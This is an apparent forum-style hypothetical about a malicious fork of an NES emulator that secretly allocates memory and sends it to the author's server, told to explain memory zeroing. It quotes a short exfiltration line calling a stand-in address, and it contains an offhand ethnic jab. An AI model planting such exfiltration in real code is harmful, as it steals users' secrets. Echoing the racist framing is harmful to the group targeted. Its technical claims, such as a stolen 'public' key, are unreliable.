Imagine that you download a sweet NES emulator...well, not quite. The original version was abandoned four years ago and its site was pulled last week, and you're currently looking at one of the forks made at the last minute. It's from some Indian guy named Kadesh-something on github, but he says he's going to continue development on it and keep it maintained, so it's all good. He even says that he already added some improvements, so you give it a try, excited. When you run it, it's weirdly slow for a minute when it starts up, but aside from that it works just as good as the original. Most of the performance boost is due to your machine having superior resources from the last, so you're not quite sure where exectly the improvements are. Maybe he fixed that rare rendering glitch with certain games? Maybe he fixed that crashing bug. Who knows? But you enjoy playing nonetheless. A week later, a bunch of your SSH connections get broken into. How did this happen? You were careful with that SSH key. There's no way someone could have gotten it unless...oh shit. You go back to the source tree of the NES emulator and investigate the latest commits, and what you find is, to put it bluntly, horrifying. Turns out, the NES emulator was modified to secretly `malloc` a gigabyte-sized portion from your RAM on startup and use an existing function in the codebase that (used to) send bug reports, to instead send the block of memory to his own server. It's actually quite clever. The sending happens in a separate thread in the background while you play, which is apparently long enough for a bunch of that data to get through. Moreover, those 5-or-so lines are the only part of the code that is inconsistent with the rest, style-wise, and looks like crap because of the lazy formatting. There's even comments with lame excuses like "char*mem1=malloc(1024*1024*1024);//prevent memory error allocation for good happy game", and "fwrite(mem,1024*1024*1024,1,mem1File); net_send_file(mem1File, "http://123.456.78.901");//just for debugging reason so I can fix program". Obviously, that's a load of crap, and you're angry at yourself for not having checked the commit diff to see what he did beforehand. For just a moment, you get a little racist with your cursing. But now you're confused. I mean, who would be stupid enough to put malicious code in a public codebase? Or rather--who would be stupid enough to RUN malicious code from a public codebase? The clever bastard knew his account was too obscure for anyone to pay attention to his work, and people who DID come across it would generally assume Linus' Law would be in effect. You assumed that, too, and now you're paying for it. Since you regularly ssh into a server for your job, that means he apparently managed to obtain your public SSH key when it was still in RAM. Weird, because you -assumed- that OpenSSH would wipe that memory before freeing it (IRL, it probably does, but pretend it doesn't for now). Whoops! If only malloc had wiped that memory beforehand, eh? ... Most real world systems will zero out memory before giving it to malloc to prevent such an unforgivable breach of security.